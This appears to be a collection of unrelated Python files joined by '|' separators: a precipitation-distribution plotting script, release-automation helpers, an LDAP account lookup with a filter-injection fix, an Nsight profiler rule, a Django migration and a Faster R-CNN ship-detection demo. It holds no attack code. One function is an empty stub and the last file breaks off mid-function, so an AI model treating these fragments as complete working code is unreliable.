        "MICRO10": ('r', '-'),
        "CLUBB10MICRO10": ('maroon', '-'),
        "CLUBBMICROSTR": ('m', '-'),
        "CLUBBMICROSTR60": ('m', '--'),
        "CLUBBMICRO60": ('indigo', '--'),
        "CLUBBMICRO10": ('indigo', '-'),
        "ALL10": ('dimgrey', '-'),
        "ALL60": ('dimgrey', '--'),
        "ALL300": ('dimgrey', ':'),
        "ALLRAD10": ('orange', '-'),
    }
num_tests = len(TEST_CASE_NAMES)
# Filename suffix encoding day range and configuration flags.
suffix = '_d{}-d{}'.format(day_str(START_DAY), day_str(END_DAY))
if FOCUS_PRECIP:
    suffix += '_precip'
if USE_PRESAER:
    suffix += '_presaer'
if TROPICS_ONLY:
    if LAND_TROPICS:
        suffix += '_lndtropics'
    else:
        suffix += '_tropics'
log_file = open("plot_precip_log{}.txt".format(suffix), 'w')
out_file_template = "{}.freq.short.d{}-d{}.nc"
# Read grid metadata (columns, bins, lat/lon, cell areas) from the
# reference case's file.
first_file_name = out_file_template.format(REF_CASE_NAME, day_str(START_DAY),
                                           day_str(END_DAY))
first_file = nc4.Dataset(join(OUTPUT_DIR, first_file_name), 'r')
ncol = len(first_file.dimensions['ncol'])
nbins = len(first_file.dimensions['nbins'])
bin_lower_bounds = first_file['bin_lower_bounds'][:]
# Bins are logarithmically spaced; width in log space.
bin_width = np.log(bin_lower_bounds[2] / bin_lower_bounds[1])
lat = first_file['lat'][:]
lon = first_file['lon'][:]
area = first_file['area'][:]
# For tropics_only cases, just use a weight of 0 for all other columns.
if TROPICS_ONLY:
    if LAND_TROPICS:
        # Just pick a random file with the same grid as the run.
        landfrac_file_name = '/p/lustre2/santos36/timestep_monthly_avgs/timestep_ctrl.0001-01.nc'
        landfrac_file = nc4.Dataset(landfrac_file_name, 'r')
        landfrac = landfrac_file['LANDFRAC'][0,:]
        for i in range(ncol):
            if np.abs(lat[i]) > 30.:
                area[i] = 0.
            else:
                area[i] *= landfrac[i]
        landfrac_file.close()
    else:
        for i in range(ncol):
            if np.abs(lat[i]) > 30.:
                area[i] = 0.
# Area-normalized weights for spatial averaging.
area_sum = area.sum()
weights = area/area_sum
first_file.close()
ref_sample_num_total = 0
test_sample_num_totals = [0 for i in range(num_tests)]
# Precipitation variables: convective, large-scale, total.
prec_vars = ("PRECC", "PRECL", "PRECT")
ref_num_avgs = {}
ref_amount_avgs = {}
for var in prec_vars:
    ref_num_avgs[var] = np.zeros((nbins,))
    ref_amount_avgs[var] = np.zeros((nbins,))
test_num_avgs = [{} for i in range (num_tests)]
test_amount_avgs = [{} for i in range (num_tests)]
for i in range(num_tests):
    for var in prec_vars:
        test_num_avgs[i][var] = np.zeros((nbins,))
        test_amount_avgs[i][var] = np.zeros((nbins,))
# Accumulate area-weighted per-bin sums for the reference case.
out_file_name = out_file_template.format(REF_CASE_NAME, day_str(START_DAY),
                                         day_str(END_DAY))
out_file = nc4.Dataset(join(OUTPUT_DIR, out_file_name), 'r')
ref_sample_num_total += out_file.sample_num
for var in prec_vars:
    num_name = "{}_num".format(var)
    amount_name = "{}_amount".format(var)
    for j in range(ncol):
        ref_num_avgs[var] += out_file[num_name][j,:] * weights[j]
    for j in range(ncol):
        ref_amount_avgs[var] += out_file[amount_name][j,:] * weights[j]
# Same accumulation for each test case.
for i in range(num_tests):
    out_file_name = out_file_template.format(TEST_CASE_NAMES[i], day_str(START_DAY),
                                             day_str(END_DAY))
    out_file = nc4.Dataset(join(OUTPUT_DIR, out_file_name), 'r')
    test_sample_num_totals[i] += out_file.sample_num
    for var in prec_vars:
        num_name = "{}_num".format(var)
        amount_name = "{}_amount".format(var)
        for j in range(ncol):
            test_num_avgs[i][var] += out_file[num_name][j,:] * weights[j]
        for j in range(ncol):
            test_amount_avgs[i][var] += out_file[amount_name][j,:] * weights[j]
# Convert accumulated sums into per-sample averages.
for var in prec_vars:
    ref_num_avgs[var] /= ref_sample_num_total
    ref_amount_avgs[var] /= ref_sample_num_total
    for i in range(num_tests):
        test_num_avgs[i][var] /= test_sample_num_totals[i]
        test_amount_avgs[i][var] /= test_sample_num_totals[i]
# Threshold for precipitation to be considered "extreme", in mm/day.
PRECE_THRESHOLD = 97.
# Find the first bin strictly above the threshold.
ibinthresh = -1
for i in range(nbins):
    if bin_lower_bounds[i] > PRECE_THRESHOLD:
        ibinthresh = i
        break
if ibinthresh == -1:
    print("Warning: extreme precip threshold greater than largest bin bound.")
# One frequency plot and one amount plot per precipitation variable;
# reference in black, each test case in its configured style.
for var in prec_vars:
    # Leave out zero bin from loglog plot.
    plt.loglog(bin_lower_bounds[1:], ref_num_avgs[var][1:], 'k')
    for i in range(num_tests):
        plt.loglog(bin_lower_bounds[1:], test_num_avgs[i][var][1:],
                   color=STYLES[SHORT_TEST_CASE_NAMES[i]][0],
                   linestyle=STYLES[SHORT_TEST_CASE_NAMES[i]][1])
    plt.title("Frequency distribution of precipitation (days {}-{})".format(
        day_str(START_DAY), day_str(END_DAY)))
    plt.xlabel("Precipitation intensity (mm/day)")
    plt.ylabel("fraction")
    plt.savefig("{}_freq{}.png".format(var, suffix))
    plt.close()
    plt.semilogx(bin_lower_bounds[1:], ref_amount_avgs[var][1:] / bin_width, 'k')
    if var == "PRECT":
        # Extreme-rate diagnostics go to the log file, not the console.
        print("Extreme precipitation rate for reference: ",
              ref_amount_avgs[var][ibinthresh:].sum(),
              file=log_file)
    for i in range(num_tests):
        plt.semilogx(bin_lower_bounds[1:], test_amount_avgs[i][var][1:] / bin_width,
                     color=STYLES[SHORT_TEST_CASE_NAMES[i]][0],
                     linestyle=STYLES[SHORT_TEST_CASE_NAMES[i]][1])
        if var == "PRECT":
            print("Extreme precipitation rate for ", SHORT_TEST_CASE_NAMES[i], ": ",
                  test_amount_avgs[i][var][ibinthresh:].sum(), "(Diff = ",
                  test_amount_avgs[i][var][ibinthresh:].sum() - ref_amount_avgs[var][ibinthresh:].sum(), ")",
                  file=log_file)
    plt.title("Amounts of precipitation (days {}-{})".format(
        day_str(START_DAY), day_str(END_DAY)))
    plt.xlabel("Precipitation intensity (mm/day)")
    plt.ylabel("Average precipitation amount (mm/day)")
    plt.savefig("{}_amount{}.png".format(var, suffix))
    plt.close()
log_file.close()
|
"""Shared functions for release script Python files"""
from collections import namedtuple
from contextlib import asynccontextmanager
from datetime import datetime, timedelta, timezone
from difflib import SequenceMatcher
import json
import os
import re
from tempfile import TemporaryDirectory
from dateutil.parser import parse
from async_subprocess import call, check_call, check_output
from constants import SCRIPT_DIR, WEB_APPLICATION_TYPE
from exception import ReleaseException
from github import (
get_pull_request,
get_org_and_repo,
)
from repo_info import RepoInfo
# Summary of a release pull request: semantic version, html URL, and body text
ReleasePR = namedtuple("ReleasePR", ['version', 'url', 'body'])
# Matches a semantic version string like "1.2.3"
VERSION_RE = r'\d+\.\d+\.\d+'
# Matches a full lowercase hex git commit hash
COMMIT_HASH_RE = r'^[a-z0-9]+$'
def parse_checkmarks(body):
    """
    Parse a PR description containing checkbox lists grouped under author headings.

    Args:
        body (str): The text of the pull request

    Returns:
        list of dict:
            One dict per commit checkbox, shaped like:
            {
                "checked": whether the author checked off their box
                "author_name": The author's name
                "title": The title of the commit
            }
    """
    parsed = []
    author = None
    for raw_line in body.split("\n"):
        if raw_line.startswith("## "):
            # An "## " heading introduces the author for the checkboxes below it
            author = raw_line[3:].strip()
            continue
        if not raw_line.startswith("  - ["):
            continue
        is_checked = raw_line.startswith("  - [x]")
        bracket_end = raw_line.find("]")
        link_start = raw_line.rfind("([")
        if bracket_end == -1 or link_start == -1:
            # Malformed checkbox line: no title can be extracted
            continue
        parsed.append({
            "checked": is_checked,
            "title": raw_line[bracket_end + 1:link_start].strip(),
            "author_name": author,
        })
    return parsed
async def get_release_pr(*, github_access_token, org, repo):
    """
    Look up the pull request information for a release, or return None if it doesn't exist

    Args:
        github_access_token (str): The github access token
        org (str): The github organization (eg mitodl)
        repo (str): The github repository (eg micromasters)

    Returns:
        ReleasePR: The information about the release pull request, or None if there is no release PR in progress
    """
    pr = await get_pull_request(
        github_access_token=github_access_token,
        org=org,
        repo=repo,
        branch='release-candidate',
    )
    if pr is None:
        return None
    # The PR title encodes the version, e.g. "Release 1.2.3"
    match = re.match(r'^Release (?P<version>\d+\.\d+\.\d+)$', pr['title'])
    if match is None:
        raise ReleaseException("Release PR title has an unexpected format")
    return ReleasePR(
        version=match.group('version'),
        body=pr['body'],
        url=pr['html_url'],
    )
async def get_unchecked_authors(*, github_access_token, org, repo):
    """
    Returns list of authors who have not yet checked off their checkboxes

    Args:
        github_access_token (str): The github access token
        org (str): The github organization (eg mitodl)
        repo (str): The github repository (eg micromasters)

    Returns:
        set[str]: A set of github usernames
    """
    release_pr = await get_release_pr(
        github_access_token=github_access_token,
        org=org,
        repo=repo,
    )
    if not release_pr:
        raise ReleaseException("No release PR found")
    unchecked = set()
    for commit in parse_checkmarks(release_pr.body):
        if not commit['checked']:
            unchecked.add(commit['author_name'])
    return unchecked
def next_workday_at_10(now):
    """
    Return 10am on the following day, pushed forward to Monday when that day
    lands on a weekend.

    Args:
        now (datetime): The current time

    Returns:
        datetime:
            10am the next day or on the following Monday of a weekend
    """
    candidate = now + timedelta(days=1)
    # isoweekday(): Monday == 1 ... Sunday == 7, so > 5 means Saturday/Sunday
    while candidate.isoweekday() > 5:
        candidate += timedelta(days=1)
    return datetime(
        candidate.year,
        candidate.month,
        candidate.day,
        hour=10,
        tzinfo=now.tzinfo,
    )
def reformatted_full_name(full_name):
    """
    Lowercase the name and keep only the first and last words, so similarity
    comparison ignores middle names.

    Args:
        full_name (str): The user's full name

    Returns:
        str: The name in lowercase, without middle names
    """
    words = full_name.lower().split()
    if not words:
        return ''
    if len(words) == 1:
        return words[0]
    return "{} {}".format(words[0], words[-1])
def format_user_id(user_id):
    """
    Wrap a user id in Slack's mention markup so Slack tags the user

    Args:
        user_id (str): A slack user id

    Returns:
        str: A user id in a Slack tag
    """
    return f"<@{user_id}>"
def match_user(slack_users, author_name, threshold=0.8):
    """
    Fuzzy-match a commit author's full name against Slack users' real names.

    Args:
        slack_users (list of dict): A list of slack users from their API
        author_name (str): The commit author's full name
        threshold (float): Minimum similarity ratio for a match to count.

    Returns:
        str: The slack markup for the handle of that author.
             If one can't be found, the author's name is returned unaltered.
    """
    target = reformatted_full_name(author_name)

    def similarity(slack_user):
        """Similarity ratio for one slack user, or 0 when below threshold"""
        candidate = reformatted_full_name(slack_user['profile']['real_name'])
        ratio = SequenceMatcher(a=target, b=candidate).ratio()
        if ratio >= threshold:
            return ratio
        if " " not in target:
            # The author only gave a single name: retry against the first name alone
            ratio = SequenceMatcher(a=target, b=candidate.split()[0]).ratio()
            if ratio >= threshold:
                return ratio
        return 0

    best_user = None
    best_score = None
    for slack_user in slack_users:
        score = similarity(slack_user)
        if score < threshold:
            continue
        # Strict > keeps the first of several equally-good matches
        if best_score is None or score > best_score:
            best_user, best_score = slack_user, score
    if best_user is None:
        return author_name
    return format_user_id(best_user['id'])
def now_in_utc():
    """
    Returns:
        datetime: The current time as a timezone-aware UTC datetime
    """
    return datetime.now(timezone.utc)
def url_with_access_token(github_access_token, repo_url):
    """
    Build a git clone URL with the access token embedded in it

    Returns:
        str: The URL formatted with an access token
    """
    org, repo = get_org_and_repo(repo_url)
    return "https://{}@github.com/{}/{}.git".format(github_access_token, org, repo)
def parse_date(date_string):
    """
    Parse a string into a date object

    Args:
        date_string (str): A date string

    Returns:
        date: The date portion of the parsed timestamp
    """
    parsed = parse(date_string)
    return parsed.date()
@asynccontextmanager
async def virtualenv(python_interpreter, env):
    """
    Create a virtualenv and work within its context

    Args:
        python_interpreter (str): Interpreter to base the virtualenv on (eg "python3")
        env (dict or None): Environment variables for the creation subprocess

    Yields:
        (str, dict): The virtualenv directory, and the environment variables
            observed after sourcing its activate script
    """
    with TemporaryDirectory() as virtualenv_dir:
        await check_call(["virtualenv", virtualenv_dir, "-p", python_interpreter], env=env, cwd=virtualenv_dir)
        # Figure out what environment variables we need to set
        # NOTE(review): parsing `env` output line-by-line assumes no variable
        # values contain newlines -- TODO confirm acceptable here
        output_bytes = await check_output(
            ". {}; env".format(os.path.join(virtualenv_dir, "bin", "activate")),
            shell=True,
            cwd=virtualenv_dir,
        )
        output = output_bytes.decode()
        # Split on the first "=" only, so values may themselves contain "="
        yield virtualenv_dir, dict(line.split("=", 1) for line in output.splitlines())
async def upload_to_pypi(*, repo_info, testing, version, github_access_token): # pylint: disable=too-many-locals
    """
    Upload a version of a project to PYPI

    Checks out the tag branch "v<version>", builds an sdist and a wheel inside
    a fresh virtualenv, and uploads both with twine.

    Args:
        repo_info (RepoInfo): The repository info
        testing (bool): If true upload to the testing server, else upload to production
        version (str): The version of the project to upload
        github_access_token (str): The github access token
    """
    branch = "v{}".format(version)
    # Set up environment variables for uploading to pypi or pypitest
    twine_env = {
        'TWINE_USERNAME': os.environ['PYPITEST_USERNAME'] if testing else os.environ['PYPI_USERNAME'],
        'TWINE_PASSWORD': os.environ['PYPITEST_PASSWORD'] if testing else os.environ['PYPI_PASSWORD'],
    }
    # This is the python interpreter to use for creating the source distribution or wheel
    # In particular if a wheel is specific to one version of python we need to use that interpreter to create it.
    python = "python3" if repo_info.python3 else "python2"
    async with init_working_dir(github_access_token, repo_info.repo_url, branch=branch) as working_dir:
        async with virtualenv("python3", None) as (_, outer_environ):
            # Heroku has both Python 2 and 3 installed but the system libraries aren't configured for our use,
            # so make a virtualenv.
            async with virtualenv(python, outer_environ) as (virtualenv_dir, environ):
                # Use the virtualenv binaries to act within that environment
                python_path = os.path.join(virtualenv_dir, "bin", "python")
                pip_path = os.path.join(virtualenv_dir, "bin", "pip")
                twine_path = os.path.join(virtualenv_dir, "bin", "twine")
                # Install dependencies. wheel is needed for Python 2. twine uploads the package.
                await check_call([pip_path, "install", "wheel", "twine"], env=environ, cwd=working_dir)
                # Create source distribution and wheel.
                # NOTE(review): `call` ignores a nonzero exit status here; a failed
                # build is only caught by the dist_files count check below -- confirm intended
                await call([python_path, "setup.py", "sdist"], env=environ, cwd=working_dir)
                universal = ["--universal"] if repo_info.python2 and repo_info.python3 else []
                build_wheel_args = [python_path, "setup.py", "bdist_wheel", *universal]
                await call(build_wheel_args, env=environ, cwd=working_dir)
                dist_files = os.listdir(os.path.join(working_dir, "dist"))
                if len(dist_files) != 2:
                    raise Exception("Expected to find one tarball and one wheel in directory")
                dist_paths = [os.path.join("dist", name) for name in dist_files]
                # Upload to pypi
                testing_args = ["--repository-url", "https://test.pypi.org/legacy/"] if testing else []
                await check_call(
                    [twine_path, "upload", *testing_args, *dist_paths],
                    env={
                        **environ,
                        **twine_env,
                    }, cwd=working_dir
                )
def load_repos_info(channel_lookup):
    """
    Load repo information from JSON and looks up channel ids for each repo

    Args:
        channel_lookup (dict): Map of channel names to channel ids

    Returns:
        list of RepoInfo: Information about the repositories
    """
    with open(os.path.join(SCRIPT_DIR, "repos_info.json")) as f:
        repos_info = json.load(f)
    return [
        RepoInfo(
            name=repo_info['name'],
            repo_url=repo_info.get('repo_url'),
            # Hash URLs only apply to deployed web applications
            rc_hash_url=(
                repo_info['rc_hash_url'] if repo_info.get('project_type') == WEB_APPLICATION_TYPE else None
            ),
            prod_hash_url=(
                repo_info['prod_hash_url'] if repo_info.get('project_type') == WEB_APPLICATION_TYPE else None
            ),
            # A KeyError here means the JSON names a channel missing from the lookup
            channel_id=channel_lookup[repo_info['channel_name']],
            project_type=repo_info.get('project_type'),
            python2=repo_info.get('python2'),
            python3=repo_info.get('python3'),
            announcements=repo_info.get('announcements'),
        ) for repo_info in repos_info['repos']
    ]
def next_versions(version):
    """
    Create the next minor and patch versions from existing version

    Args:
        version (str): A version string which is already validated

    Returns:
        (str, str): The version with the minor part bumped (patch reset to 0),
            and the version with only the patch part bumped
    """
    major, minor, patch = version.split(".")
    minor_bump = "{}.{}.0".format(major, int(minor) + 1)
    patch_bump = "{}.{}.{}".format(major, minor, int(patch) + 1)
    return minor_bump, patch_bump
@asynccontextmanager
async def init_working_dir(github_access_token, repo_url, *, branch=None):
    """Create a new directory with an empty git repo

    Args:
        github_access_token (str): The github access token
        repo_url (str): URL of the repository to fetch
        branch (str or None): Branch to check out; defaults to master

    Yields:
        str: Path of a temporary directory containing the checked-out branch;
            deleted when the context exits
    """
    if branch is None:
        branch = 'master'
    url = url_with_access_token(github_access_token, repo_url)
    with TemporaryDirectory() as directory:
        # from http://stackoverflow.com/questions/2411031/how-do-i-clone-into-a-non-empty-directory
        await check_call(["git", "init", "-q"], cwd=directory)
        await check_call(["git", "config", "push.default", "simple"], cwd=directory)
        await check_call(["git", "remote", "add", "origin", url], cwd=directory)
        await check_call(["git", "fetch", "--tags", "-q"], cwd=directory)
        await check_call(["git", "checkout", branch, "-q"], cwd=directory)
        yield directory
|
import ldap
from django.conf import settings
from django.utils.encoding import smart_str
import commonware.log
log = commonware.log.getLogger('ldap')
# Cache of bound LDAP connections keyed by "host:port" server string
_conn_cache = {}
def connect_ldap():
    """Return a bound LDAP connection for the configured server, reusing a cached one when present."""
    server = '{host}:{port}'.format(**settings.LDAP)
    if server in _conn_cache:
        log.debug("using cached LDAP connection")
        return _conn_cache[server]
    log.info("Initializing new LDAP connection")
    l = ldap.initialize(server)
    # Apply the same timeout to connection setup, the server-side search time
    # limit, and client-side operations
    l.network_timeout = settings.LDAP_TIMEOUT
    l.timelimit = settings.LDAP_TIMEOUT
    l.timeout = settings.LDAP_TIMEOUT
    # NOTE(review): cached connections are never re-validated, so a dropped
    # connection would stay in the cache -- confirm acceptable
    l.simple_bind_s(settings.LDAP['user'], settings.LDAP['password'])
    _conn_cache[server] = l
    return l
def has_account(email):
    """
    Check whether an LDAP directory entry exists for the given email address.

    Args:
        email (str): The email address to look up (treated as untrusted input)

    Returns:
        bool: True if an entry with that mail attribute exists; False when no
            match is found, the search times out, or the search base is missing
    """
    # Local import keeps this module's import footprint unchanged
    from ldap.filter import escape_filter_chars
    try:
        l = connect_ldap()
        # SECURITY FIX: escape the email before interpolating it into the LDAP
        # filter so special characters ( ( ) * \ NUL ) can't alter the query
        # (LDAP filter injection).
        safe_mail = escape_filter_chars(email)
        resp = l.search_st(settings.LDAP['search_base'], ldap.SCOPE_SUBTREE,
            '(mail={mail})'.format(mail=safe_mail), ['mail'], timeout=settings.LDAP_TIMEOUT)
        return bool(resp)
    except ldap.TIMEOUT:
        log.warning("ldap search timed out")
        return False
    except ldap.NO_SUCH_OBJECT:
        log.debug("no account found")
        return False
def subscription_has_account(subscription):
    """Return True when the subscription's subscriber email has an LDAP account."""
    return has_account(smart_str(subscription.subscriber.email))
|
def zigzag(text, n):
|
import NvRules
def get_identifier():
    """Unique identifier of this rule."""
    return "CPIStallSleeping"
def get_name():
    """Human-readable name of this rule."""
    return "CPI Stall 'Sleeping'"
def get_description():
    """Short description shown alongside the rule's results."""
    return "Warp stall analysis for 'Sleeping' issues"
def get_section_identifier():
    """Report section this rule attaches to."""
    return "WarpStateStats"
def apply(handle):
    """Warn when a kernel's warps spend a large share of inter-issue cycles stalled in the 'sleeping' state."""
    ctx = NvRules.get_context(handle)
    action = ctx.range_by_idx(0).action_by_idx(0)
    fe = ctx.frontend()
    isSupported = False
    ccMajor = action.metric_by_name("device__attribute_compute_capability_major").as_uint64()
    ccMinor = action.metric_by_name("device__attribute_compute_capability_minor").as_uint64()
    # Only compute capability 7.x devices are treated as supported by this check
    if ccMajor == 7 and ccMinor >= 0:
        isSupported = True
    # Average fraction of active cycles in which an instruction was issued
    issueActive = action.metric_by_name("smsp__issue_active.avg.per_cycle_active").as_double()
    # Average cycles a warp is stalled on 'sleeping' per issued instruction
    warpCyclesPerStall = action.metric_by_name("smsp__average_warps_issue_stalled_sleeping_per_issue_active.ratio").as_double()
    # Average active warp cycles between two issued instructions
    warpCyclesPerIssue = action.metric_by_name("smsp__average_warps_active_per_issue_active.ratio").as_double()
    # Fire when the issue rate is low and sleeping stalls exceed 30% of the
    # average cycles between issued instructions
    if isSupported and issueActive < 0.8 and 0.3 < (warpCyclesPerStall / warpCyclesPerIssue):
        message = "On average each warp of this kernel spends {:.1f} cycles being stalled waiting for a thread in the warp to come out of the sleep state. This represents about {:.1f}% of the total average of {:.1f} cycles between issuing two instructions. Reduce the number of executed NANOSLEEP instructions, lower the specified time delay, and attempt to group threads in a way that multiple threads in a warp sleep at the same time.".format(warpCyclesPerStall, 100.*warpCyclesPerStall/warpCyclesPerIssue, warpCyclesPerIssue)
        fe.message(NvRules.IFrontend.MsgType_MSG_WARNING, message)
|
# Generated by Django 3.1.4 on 2021-02-12 18:13
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import phonenumber_field.modelfields
class Migration(migrations.Migration):
    """Create the Order and OrderItem models, plus an order_items M2M on Order."""
    dependencies = [
        ("foodcartapp", "0037_auto_20210125_1833"),
    ]
    operations = [
        migrations.CreateModel(
            name="Order",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("firstname", models.CharField(max_length=100)),
                ("lastname", models.CharField(max_length=100)),
                (
                    "phonenumber",
                    phonenumber_field.modelfields.PhoneNumberField(
                        max_length=128, region="RU"
                    ),
                ),
                ("address", models.CharField(max_length=255)),
                (
                    "status",
                    models.CharField(
                        choices=[
                            ("Handled", "Обработано"),
                            ("Unhandled", "Необработано"),
                        ],
                        default="Unhandled",
                        max_length=125,
                    ),
                ),
                ("comment", models.TextField(blank=True)),
                (
                    "registered_at",
                    models.DateTimeField(default=django.utils.timezone.now),
                ),
                ("called_at", models.DateTimeField(blank=True, null=True)),
                ("delivered_at", models.DateTimeField(blank=True, null=True)),
                (
                    "payment",
                    models.CharField(
                        choices=[
                            ("CASH", "Наличными"),
                            ("CARD", "Электронно"),
                        ],
                        default="CARD",
                        max_length=125,
                    ),
                ),
            ],
            options={
                "verbose_name": "Заказ",
                "verbose_name_plural": "Заказы",
            },
        ),
        migrations.CreateModel(
            name="OrderItem",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("quantity", models.IntegerField()),
                # presumably a price snapshot taken at order time -- confirm
                ("price", models.IntegerField(default=0)),
                (
                    "order",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="items",
                        to="foodcartapp.order",
                    ),
                ),
                (
                    "product",
                    models.ForeignKey(
                        blank=True,
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        to="foodcartapp.product",
                    ),
                ),
            ],
            options={
                "verbose_name": "Позиция заказа",
                "verbose_name_plural": "Позиции заказа",
            },
        ),
        # NOTE(review): OrderItem already links to Order via the `order` FK
        # (related_name="items"); this extra M2M looks redundant -- confirm
        migrations.AddField(
            model_name="order",
            name="order_items",
            field=models.ManyToManyField(
                related_name="order_parent", to="foodcartapp.OrderItem"
            ),
        ),
    ]
|
#!/usr/bin/env python
# --------------------------------------------------------
# Faster R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
"""
Demo script showing detections in sample images.
See README.md for installation instructions before running.
"""
#import _init_paths
from fast_rcnn.config import cfg, cfg_from_file
from fast_rcnn.test import im_detect
from fast_rcnn.nms_wrapper import nms
from utils.timer import Timer
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import numpy as np
import scipy.io as sio
import caffe, os, sys, cv2
import argparse
from contextlib import contextmanager
import shutil
from subprocess import Popen, PIPE
import shlex
import tempfile
import re
import time
import fcntl
from timeit import default_timer as timer
from osgeo import gdal
# Object classes the detector outputs; index 0 must be the background class
CLASSES = ('__background__',
           'ship',
           'fast_ship')
# Map of --net CLI choice to (model directory name, trained weights filename)
NETS = {'vgg16': ('VGG16',
                  'VGG16_faster_rcnn_final.caffemodel'),
        'vgg': ('VGG_CNN_M_1024',
                'VGG_faster_rcnn_final.caffemodel'),
        'zf': ('ZF',
               'ZF_faster_rcnn_final.caffemodel')}
def fileno(file_or_fd):
    """Return the underlying file descriptor for a file object, or pass through a raw fd."""
    _missing = object()
    getter = getattr(file_or_fd, 'fileno', _missing)
    fd = file_or_fd if getter is _missing else getter()
    if not isinstance(fd, int):
        raise ValueError("Expected a file (`.fileno()`) or a file descriptor")
    return fd
def vis_detections(im, class_name, dets, thresh=0.5):
    """Draw detected bounding boxes.

    Args:
        im: Image array in BGR (OpenCV) channel order
        class_name: Label drawn next to each box
        dets: N x 5 array of [x1, y1, x2, y2, score] rows
        thresh: Minimum score for a detection to be drawn
    """
    # Keep only detections whose score (last column) clears the threshold
    inds = np.where(dets[:, -1] >= thresh)[0]
    if len(inds) == 0:
        return
    # BGR (OpenCV) -> RGB (matplotlib)
    im = im[:, :, (2, 1, 0)]
    fig, ax = plt.subplots(figsize=(12, 12))
    ax.imshow(im, aspect='equal')
    for i in inds:
        bbox = dets[i, :4]
        score = dets[i, -1]
        ax.add_patch(
            plt.Rectangle((bbox[0], bbox[1]),
                          bbox[2] - bbox[0],
                          bbox[3] - bbox[1], fill=False,
                          edgecolor='red', linewidth=3.5)
            )
        ax.text(bbox[0], bbox[1] - 2,
                '{:s} {:.3f}'.format(class_name, score),
                bbox=dict(facecolor='blue', alpha=0.5),
                fontsize=14, color='white')
    ax.set_title(('{} detections with '
                  'p({} | box) >= {:.1f}').format(class_name, class_name,
                                                  thresh),
                  fontsize=14)
    plt.axis('off')
    plt.tight_layout()
    plt.draw()
def demo(net, im_file):
    """Detect object classes in an image using pre-computed object proposals.

    The tile filename must end in _<xoff>_<yoff>.jpg; those offsets place the
    tile's detections back into full-image coordinates.

    Returns a list of "<class> <x> <y> <w> <h>" strings (empty on bad filename).
    """
    # compute the file offset from the name
    iterEx = re.compile(".*?_(\d+)_(\d+)\.jpg$")
    itIter = iterEx.findall(im_file)
    if len(itIter) > 0:
        xoff = int(itIter[0][0])
        yoff = int(itIter[0][1])
    else:
        print("Bad Filename " + im_file + ". No offsets! Skipping file")
        return []
    # Load the demo image as gray scale
    gim = cv2.imread(im_file, flags= cv2.CV_LOAD_IMAGE_GRAYSCALE)
    # convert to rgb repeated in each channel
    im = cv2.cvtColor(gim, cv2.COLOR_GRAY2BGR)
    # Detect all object classes and regress object bounds
    timer = Timer()
    timer.tic()
    scores, boxes = im_detect(net, im)
    timer.toc()
    print ('Detection took {:.3f}s for '
           '{:d} object proposals').format(timer.total_time, boxes.shape[0])
    # Visualize detections for each class
    CONF_THRESH = 0.5
    NMS_THRESH = 0.3
    res = []
    for cls_ind, cls in enumerate(CLASSES[1:]):
        cls_ind += 1 # because we skipped background
        # Each class owns its own 4-column slice of regressed boxes
        cls_boxes = boxes[:, 4*cls_ind:4*(cls_ind + 1)]
        cls_scores = scores[:, cls_ind]
        dets = np.hstack((cls_boxes,
                          cls_scores[:, np.newaxis])).astype(np.float32)
        # Non-maximum suppression, then keep confident detections only
        keep = nms(dets, NMS_THRESH)
        dets = dets[keep, :]
        inds = np.where(dets[:,-1] >= CONF_THRESH)[0]
        for i in inds:
            bbox = dets[i, :4]
            score = dets[i, -1]
            # Emit x, y, width, height shifted into full-image coordinates
            res.append(cls + " {0} {1} {2} {3}".format(xoff + bbox[0], yoff + bbox[1], bbox[2] - bbox[0], bbox[3] - bbox[1]))
    return res
def parse_args():
    """Parse input arguments.

    Returns:
        argparse.Namespace with gpu_id, cpu_mode, demo_net, cfg_file,
        model_file, proto_file, split_size, tile_path, and file.
    """
    parser = argparse.ArgumentParser(description='Faster R-CNN demo')
    parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',
                        default=0, type=int)
    parser.add_argument('--cpu', dest='cpu_mode',
                        help='Use CPU mode (overrides --gpu)',
                        action='store_true')
    parser.add_argument('--net', dest='demo_net', help='Network to use [zf]',
                        choices=NETS.keys(), default='vgg')
    parser.add_argument('--cfg', dest='cfg_file',
                        help='optional config file',
                        default=None, type=str)
    parser.add_argument('--model', dest='model_file',
                        help='caffe model file',
                        default=None, type=str)
    parser.add_argument('--proto', dest='proto_file',
                        help='caffe prototext file',
                        default=None, type=str)
    parser.add_argument('--split', dest='split_size',
                        help='width && height for split up images',
                        action='store', type=int)
    parser.add_argument('--tiles', dest='tile_path',
                        help='image tile output path',
                        default=None, type=str)
    parser.add_argument('file', help="Image file or dir to process",
                        type=str)
    args = parser.parse_args()
    return args
def split_up_file(fname, tempDir, splitSize, maxCnt):
    """
    Cut a large raster into splitSize x splitSize JPEG tiles using gdal_translate.

    Args:
        fname: Source image path (.tif assumed 8-bit, anything else 16-bit)
        tempDir: Directory that receives the JPEG tiles
        splitSize: Tile width and height in pixels
        maxCnt: Stop after this many tiles; <= 0 means no limit

    Returns:
        List of tile paths named <base>_<i>_<j>.jpg so downstream code can
        recover each tile's offsets from its name.
    """
    dset = gdal.Open(fname)
    width = dset.RasterXSize
    height = dset.RasterYSize
    baseName = os.path.basename(fname)
    tName = os.path.join(tempDir, baseName)
    fileList = []
    cnt = 1
    nname, ext = os.path.splitext(fname)
    #Here we assume tif files are 8 bit and ntf are 16 bit
    if ext.lower() == '.tif':
        bitSize = 8
    else:
        bitSize = 16
    for i in range(0, width, splitSize):
        for j in range(0, height, splitSize):
            if maxCnt > 0 and cnt > maxCnt:
                return fileList
            cnt += 1
            w = min(i+splitSize, width) - i
            h = min(j+splitSize, height) - j
            xoff = i
            yoff = j
            # Edge tiles are shifted back so every crop is a full splitSize square
            if w < splitSize:
                xoff = i - (splitSize - w)
                if xoff < 0:
                    xoff = 0
            if h < splitSize:
                yoff = j - (splitSize - h)
                if yoff < 0:
                    yoff = 0
